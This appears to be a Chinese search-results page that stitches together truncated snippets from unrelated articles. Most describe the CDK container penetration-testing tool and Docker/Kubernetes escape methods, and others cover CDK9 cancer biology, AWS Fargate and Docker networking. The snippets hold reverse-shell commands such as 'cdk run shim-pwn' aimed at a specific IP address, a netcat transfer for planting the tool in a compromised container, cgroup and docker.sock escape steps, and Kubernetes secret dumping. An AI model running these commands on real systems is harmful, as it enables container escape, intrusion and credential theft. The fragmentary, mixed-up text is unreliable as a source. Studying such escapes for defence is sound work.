项目名称:CDK 项目作者:CDK-Team 项目地址: https://github.com/cdk-team/CDK/ CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及...CDK为安全测试人员提供了golang原生的容器环境渗透能力,主要有以下几点: 评估容器内部弱点、搜集敏感信息。 提供多种容器逃逸的漏洞利用方式。 提供K8s环境的多种持久化、横向移动方式。...提供原生的进程、网络命令,便于测试者自定义攻击操作。 功能 CDK包括三个功能模块 Evaluate: 容器内部信息收集,以发现潜在的弱点便于后续利用。...✔ link kproxy kubectl代理转发 使用方法 下载可执行文件投递到已攻入的容器内部开始测试: https://github.com/cdk-team/CDK/releases/.../cdk run shim-pwn 47.104.151.168 111 docker.sock漏洞逃逸 通过本地docker.sock向控制宿主机的docker进程,拉取指定的后门镜像并运行,运行过程中镜像将宿主机的根目录
也欢迎各界朋友各种形式的合作! CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。...GitHub地址: https://github.com/cdk-team/CDK/ CDK 功能 CDK包括三个功能模块 Evaluate: 容器内部信息收集,以发现潜在的弱点便于后续利用。...CDK为安全测试人员提供了golang原生的容器环境渗透能力,主要以下几点: 评估容器内部弱点、搜集敏感信息。 提供多种容器逃逸的漏洞利用方式。 提供K8s环境的多种持久化、横向移动方式。...如果你可以在目标容器中执行命令(RCE),但容器中没有wget或curl命令,可以参考下面方法植入: 将CDK下载到你的公网服务器,监听端口: nc -lvp 999 < cdk 在已攻入的目标容器中执行.../serviceaccount/token) CDK将利用该凭据尝试认证K8s api-server服务器并访问高权限接口,如果执行成功意味着该账号拥有高权限,就可以直接利用Service Account
当容器具有SYS_ADMIN的Capability的话,则可以进行容器逃逸。它允许大量的特权操作,包括mount文件系统,交换空间,还有对各种设备的操作以及系统调试相关的调用。...-security-opt apparmor=unconfined --name=test nginx:latest 在容器中使用cdk进行检测,可以看到容器中多了CAP_SYS_ADMIN的Capability...在容器内挂载宿主机cgroup的memory #将cgroup进行挂载 mkdir /tmp/test && mount -t cgroup -o memory cgroup /tmp/test #接着我们在挂载的目录下再创建一个子进程...,主要攻击目标应在子进程内,因为攻击的过程需要将cgroup下所有的task清除,所以在同样环境的子进程内进行更加合理安全 mkdir /tmp/test/x 第二步就需要我们设置notify_on_release...该命令启动一个sh进程,将sh进程的PID写入到/tmp/test/x/cgroup.procs中。这里的\$\$表示sh进程的PID。
通过使用namespace,可以将不同进程之间的资源进行隔离,使得它们感觉像是在独立的环境中运行 用简洁明了的话来说,namespace实现了容器与容器,容器与宿主机之间的隔离 **而业内广为人知的**...User namespace:使得不同namespace下的进程可以有不同的用户和用户组ID,进程只能对相同namespace下的用户进行权限管理。...我们可以在容器内部创建一个新的容器,因为Docker Socket被挂载到了当前容器,所有我们可以将宿主机目录挂载到新的容器内部 即在容器内创建一个挂载了宿主机根目录的容器,然后将目录切换到根目录即可完成逃逸...host模式 接下来我们使用大名鼎鼎的CDK https://github.com/cdk-team/CDK/wiki/CDK-Home-CN 如何将CDK上传到容器内部?.../cdk run shim-pwn reverse [ip] [port] vps上面开启nc 反弹宿主机shell Docker 远程 API 未授权访问逃逸 docker的2375端口是干啥的?
收集这些诊断工件有两种不同的机制:用于按需收集工件的HTTP API 。当您已经知道您的应用程序遇到问题并且您有兴趣收集更多信息时,您可以调用这些 API 端点。...ETW, eventpipe, lldb, dotnet-trace, dotent-counters 等可以查看 dotnet diagnostics.目标应用程序容器准备首先, 我们得让我们被调试的目标程序公开这个诊断端口...未作特别声明的话, 后文给出的实验都是基于AWS Fargate 和 Linux 配置....到此, 目标程序容器的配置就完成了, 接下来配置dotnet-monitordotnet-monitor容器准备增加 Docker image 作为目标容器的sidecar 容器.暴露端口52323 #...dotnet-monitor映射端口.增加容器启动命令参数 --no-auth # 简单粗暴的让所有的API都不要鉴权.添加环境变量 DOTNETMONITOR_DiagnosticPort__ConnectionMode
User namespace:使得不同namespace下的进程可以有不同的用户和用户组ID,进程只能对相同namespace下的用户进行权限管理。...privileged 特权容器的权限其实有很多,所以也有很多不同的逃逸方式,挂载设备读写宿主机文件是特权容器最常见的逃逸方式之一如何判断当前容器是以Privileged 特权模式启动的呢?...我们可以在容器内部创建一个新的容器,因为Docker Socket被挂载到了当前容器,所有我们可以将宿主机目录挂载到新的容器内部即在容器内创建一个挂载了宿主机根目录的容器,然后将目录切换到根目录即可完成逃逸我们在当前容器内部安装...host模式接下来我们使用大名鼎鼎的CDKhttps://github.com/cdk-team/CDK/wiki/CDK-Home-CN如何将CDK上传到容器内部?.../cdk run shim-pwn reverse [ip] [port]vps上面开启nc反弹宿主机shellDocker 远程 API 未授权访问逃逸docker的2375端口是干啥的?
通过对静息和poly (I:C)刺激的肺癌细胞(A549)进行差异定量蛋白质组学研究,获得CDK9相互作用组的全貌。在CDK9互作子中发现591个蛋白,其中包括~70%的新型高信赖蛋白。...54中代谢活性弱的腙连接子,23中被稳定的脂肪族氨基连接子取代后,在保持CDK9选择性的同时降低了活性。 图13....有几项研究描述了CDK9在转录的不同方面的作用。鉴于CDK9在转录中的核心作用,很可能不同的异构体定位于不同的复合物,具有细胞类型特异性功能。目前,有充分证据强烈支持CDK9作为癌症靶点。...这种灵活性可能是CDK9适应不同复合物中不同结合环境的关键。因此,在任何特定时间,小分子CDK9抑制剂可能只针对含有CDK9的复合物的一个子集。...这些研究强烈反对将CDK9抑制剂相关的某些脱靶效应工程化,特别是那些将下调Bcl-xL等其他抗凋亡蛋白水平的效应。但是,某些靶外效应,如抑制正常细胞生长是不可取的,应该避免。
Kubernetes是一种开源技术,可以自动部署、扩展和管理容器,即容器化应用程序。 为了实现高可用性,EKS 跨不同的 AWS 可用区运行和扩展 Kubernetes 控制平面。...AWS Fargate:Fargate 是 AWS 托管的无服务器计算引擎,允许您执行容器应用程序而无需维护服务器。...托管集群更新 Kubernetes 的版本升级是即时执行的,无需构建新集群或将应用程序转移到新集群。...亚马逊网络服务 (AWS) 简介 如果您使用 AWS Fargate,价格取决于从您开始下载容器映像到 Amazon EKS pod 完成所消耗的 vCPU 和 RAM 量,时间计算将四舍五入到最接近的秒数...您可以根据需要购买不同类型的 AWS Outposts 机架配置,机架配置是 EC2 实例类型、EBS gp2 Volume 和 S3 on Outposts 的组合。
04 CDK 作者:cdkteam 开发语言:Golang github star:3.2k https://github.com/cdk-team/CDK CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及...并且在企业网络目前阻断445端口严重的情况下可以无需445端口进行横向移动,效率高且不易被检测。...反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用。...其基于带外应用安全测试( OAST)通过任务的形式,将不同漏洞场景检测能力通过插件的形式进行集合,通过与目标进行Out-of-bind的数据通信方式进行辅助检测。...,并定期将答疑内容整理发布,以供参考交流。
一般来说内网不会完全基于容器技术进行构建。所以起点一般可以分为权限受限的容器和物理主机内网。...Service间的通信 当我们起点是一个在k8s集群内部权限受限的容器时,和常规内网渗透区别不大,上传端口扫描工具探测即可。...: 运维人员配置不当,将system:anonymous用户绑定到cluster-admin用户组,从而使6443 端口允许匿名用户以管理员权限向集群内部下发指令。...采用CDK攻击 CDK(Container DucK)是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。...其中,10250端口是可读写的,10255是一个只读端口。 最常见的未授权访问一般是10255端口,但这个端口的利用价值偏低,只能读取到一些基本信息。
很多开发者基于对 Serverless 优势的理解,容易陷入“它是容器替代方案”的认知误区。而实际上,Serverless 与容器针对的是不同的用户需求。...直至 2017 年年底的 AWS re:Invent 大会上,AWS 宣布针对容器的无服务器计算引擎推出 AWS Fargate,云计算技术尤其是 Serverless 架构和应用的演进,才算真正迎来了一次新的机遇点...Fargate 不仅可以抽象出运行容器的服务器,还可以提供服务器编排的抽象,作为容器的免编排计算。...这也意味着,当 K8s 等容器编排工具的使用度越来越高,乃至成为开发中的一项“基础设施”时,开发者们可以将创建和管理容器的事情交给云服务商(Fargate)来处理,就好像今天的服务器虚拟化一般,容器也越来越...归纳来看,无论是扩充提供不同的服务还是丰富的开发者工具,AWS 都是尽可能地帮助开发者在应用 Serverless 架构的过程中,降低其遇到不同场景下处理复杂问题的难度,从而让为“高效”而生的 Serverless
Docker和服务器无状态化:容器化应用的优势 摘要 本文将深入探讨Docker和服务器无状态化的概念,重点阐述容器化应用的优势。...引言 Docker是一种轻量级的容器化技术,它可以将应用程序及其所有依赖项打包为一个可移植的容器。...许多云服务提供商都推出了基于Docker的无状态容器服务,如AWS Fargate、Azure Container Instances等。...Docker和服务器无状态化在不同领域的应用 Docker和服务器无状态化在不同领域都有广泛的应用。在互联网领域,应用往往需要面对大量的用户和流量,需要具备高可伸缩性。...通过将各个服务容器化,并采用无状态化部署,可以更好地实现服务的弹性伸缩和独立运维。
攻击者后续使用不同的账户推送带有挖矿程序的镜像,一直到 2023 年 3 月。...攻击者提供了不同版本的代码,以防止被 GitHub 搜索引擎跟踪。...攻击者利用该服务生成私有存储库,将其作为不同服务的源。这可以将攻击行为完全控制在 AWS 内。 repo.sh脚本在每个区域都会创建一个名为 test 的 CodeCommit 存储库。...ECS/Fargate ecs.sh显然是用于在 AWS ECS 服务中进行挖矿的,而 Amazon ECS 是一种用于管理和部署容器编排服务。...为容器分配 2 核 CPU 与 4 GB 内存,并且通过设置 “”requiresCompatibilities”: [“FARGATE”]” 将其配置在 Fargate 上运行。
文章前言 Kubernetes是当今最流行的容器编排工具之一,为企业应用部署和管理提供了高效、稳定的解决方案。然而在运行Kubernetes集群时,管理员需要对集群内的各个组件进行监控和维护。...本文将从不同角度介绍Kubernetes集群信息收集的相关技术,并提供一些实用的工具和方法,帮助管理员更好地理解和使用Kubernetes集群信息收集技术,进一步提升Kubernetes集群的安全性和可靠性.../cdk run k8s-secret-dump auto 安全策略 对于已经获取了kubeconfig或sa账号权限,进而想要创建特殊配置的容器,但是受到了K8s Pod Security Policies...端口服务 内部网络 Flannel默认使用10.244.0.0/16网络 Calico默认使用192.168.0.0/16网络 文末小结 总的来说,Kubernetes集群信息收集是保证企业应用部署和运行环境安全性和稳定性的关键一环...3、收集网络信息:使用工具(如Weave Scope或Cilium)来监视容器之间的网络通信,并检查网络连接和流量是否正常。
提供注册域名并将记录自动指向运行隧道的服务器。 自动设置和管理域名的 HTTPS 证书(顶级域名和子域)。...提供客户端工具,通过服务器进行 HTTP/TCP 连接的隧道,无需在客户端 root 权限。 提供简单 GUI 界面,允许用户将 X 域/子域映射到 Z 客户端上 Y 端口,并代理所有连接到该域。...提供高级语言,抽象低级加密概念,便于将私有应用程序集成到堆栈中 编译为电路,使零知识证明实际可行 受传统编程语言(如 JavaScript、Scala 和 Rust)影响,在易读性和易用性方面具有很强的重点...在 Rust 中编写的 Python-3(CPython >= 3.12.0)解释器。 可以在 WebAssembly 上运行在线演示。 支持 JIT 编译器,将 Python 函数编译成本机代码。...License: Apache-2.0 picture example-voting-app 是一个示例分布式应用程序,由多个 Docker、Compose、Swarm 和 Kubernetes 容器组成
├ chrome //chrome浏览器 ├ masscan //异步传输,无状态的扫描端口工具 ├ OneForAll //一款功能强大的子域收集工具...进行CDN检测,之后不存在CDN的目标再利用shodan api进行端口检测以及服务识别的过程,然后将检测到的目标按照协议:DOMAIN:端口的格式存储到TASK表中,如果目标存在CDN则默认返回80端口存储到...在子域收集完成后,我们就可以进行端口检测过程了,这里我们默认使用的是shodan api,默认线程数目为10,其中masscan+nmap代码已经加入其中,默认阈值是50,只需要进行简单的代码上的调整就可以完成应用.../lib/config.py中修改这一限制,如果你是通过手工安装,你可以通过访问http://127.0.0.1:5000来查看这一页面,如果你是 Docker安装,你可以通过Docker命令将它映射到宿主机的相应端口上...OneForAll - 一款功能强大的子域收集工具 2.
Docker 容器连接 前面我们实现了通过网络端口来访问运行在docker容器内的服务。 容器中可以运行一些网络应用,要让外部也可以访问这些应用,可以通过-P或-p参数来指定端口映射。...下面我们来实现通过端口连接到一个docker容器。 网络端口映射 我们创建了一个python应用的容器。...两种方式的区别是: -P:是容器内部端口随机映射到主机的端口。 -p:是容器内部端口绑定到指定的主机端口。...docker 有一个连接系统允许将多个容器连接在一起,共享连接信息。 docker 连接会创建一个父子关系,其中父容器可以看到子容器的信息。...--dns-search=DOMAIN:设定容器的搜索域,当设定搜索域为.test.com时,在搜索一个名为host的主机时,DNS不仅搜索host,还会搜索host.test.com。
CaaS - 容器即服务 当我们创建容器后,把它扔到 CaaS 上,它就会自动运行、服务和扩展,比如 Azure Container Instances、Google Cloud Run 或 AWS Fargate...FaaS 可以用不同的方式来运行你的代码,一种方式可能是 FaaS 为每一次代码变化构建一个容器,就类似于使用 CaaS 这种服务。...FaaS 构建成容器发送给 CaaS 另一种方式是 FaaS 在启动过程中动态地将函数的源码拉到一个预定义的环境(容器)中,不同的语言会有不同的环境,当使用像 Go 这样的编译语言时,那么编译必须在启动时进行...CaaS - 容器即服务 可以看到我们大大减少了需要创建的 Kubernetes 资源清单的数量,CaaS 将为我们创建所有必要的子资源,比如 autoscaler、Ingress 或 Istio 路由...虽然 Pods 的容器不是运行在虚拟机上,而是在云提供商的无服务器容器产品中,如 AWS Fargate、Google Cloud Run 或 Azure Container Instances。
,然后将宿主机的根目录挂载到当前目录中(这里如果不存在特权用户,但docker容器配置不当-进行危险挂载,是同样的风险,之后可以用相同的利用方式)。...简单来说就是:docker容器以--net=host 启动会暴露containerd-shim 监听的 Unix 域套接字。特定版本的Containerd未做权限控制,可以实现提权。...是否能获取containerd-shim 监听的 Unix 域套接字:cat /proc/net/unix|grep -a "containerd-shim"3、漏洞利用以--net=host 启动容器直接下载...exp并解压https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz在kali中开启监听,并执行exp...成功接受到shellPart04 如何防止docker逃逸1、避免使用特权模式启动容器,或者限制容器所需的最小权限;2、避免将宿主机上的敏感文件或目录挂载到容器内部,或者使用只读模式挂载;3、避免将Docker
针对由Docker创建的每一个容器,都会创建一个虚拟的以太网设备(Veth设备对),其中一端关联到网桥上,另一端使用Linux的网络命名空间技术,映射到容器内的eth0设备,然后从网桥的地址段内给eth0...这样做的结果就是,在同一台机器内的容器之间可以相互通信,不同主机上的容器不能相互通信,实际上它们甚至有可能在相同的网络地址范围内(不同主机上的docker0的地址段可能是一样的)。...而且API Server要在分配完后,将动态端口插入配置的合适位置,服务也必须能互相找到对方等。这些都是Docker的网络模型在跨主机访问时面临的问题。...如上新增的规则可以看出,Docker服务在NAT和FILTER两个表内添加的两个DOCKER子链都是给端口映射用的。在本例中我们需要把外面宿主机的1180端口映射到容器的5000端口。...当然在Forward时,也需要在DOCKER子链中添加一条规则,如果目标端口和地址是指定容器的数据,则允许通过。在Docker按照端口映射的方式启动容器时,主要的不同就是上述iptables部分。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
